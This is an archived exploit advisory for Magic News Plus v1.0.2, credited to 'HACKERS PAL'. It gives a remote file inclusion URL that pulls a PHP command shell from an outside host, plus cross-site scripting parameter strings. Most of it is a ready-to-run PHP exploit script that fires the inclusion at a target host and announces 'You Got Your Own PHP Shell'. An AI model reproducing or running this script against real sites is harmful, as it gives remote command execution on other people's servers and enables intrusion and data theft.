AOH :: HP Unsorted M :: C07-2422.HTM

Magic News Plus File Inclusion And Xss Vulnerabilitis



Magic News Plus File Inclusion And Xss Vulnerabilitis
Magic News Plus File Inclusion And Xss Vulnerabilitis



Hello,,

Magic News Plus File Inclusion And Xss Vulnerabilitis

Tested on v1.0.2 Any Other Version maybe Infected

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net 
Email Address : security@soqor.net 

Remote File Inclusion
preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt?/ss&cmd=dir 

Xss (Cross Site Scripting)
news.php?GLOBALS[]=1&link_parameters=">
n_layouts.php?link_parameters=">


Exploit:-
#!/usr/bin/php -q -d short_open_tag=on
WwW.SoQoR.NeT 
*/
print_r('
/**********************************************/
/*       Magic News  Command Execution        */
/* by HACKERS PAL  */ 
/* site: http://www.soqor.net */'); 
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host
/* Example:                                   */
/* php '.$argv[0].' http://localhost/ 
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);

$url=$argv[1]."/";
$exploit="preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt?/soqor"; 
$page=$url.$exploit;
         Function get_page($url)
         {

                  if(function_exists("file_get_contents"))
                  {

                       $contents = file_get_contents($url);

                          }
                          else
                          {
                              $fp=fopen("$url","r");
                              while($line=fread($fp,1024))
                              {
                               $contents=$contents.$line;
                              }


                                  }
                       return $contents;
         }

     $newpage = get_page($page);

     if(eregi("Cannot execute a blank command",$newpage))
     {
Die("\n[+] Exploit Finished\n[+] Go To : ".$url."preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt?/soqor\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); 
             }
             Else
             {
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/"); 
                }
?>

#WwW.SoQoR.NeT 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.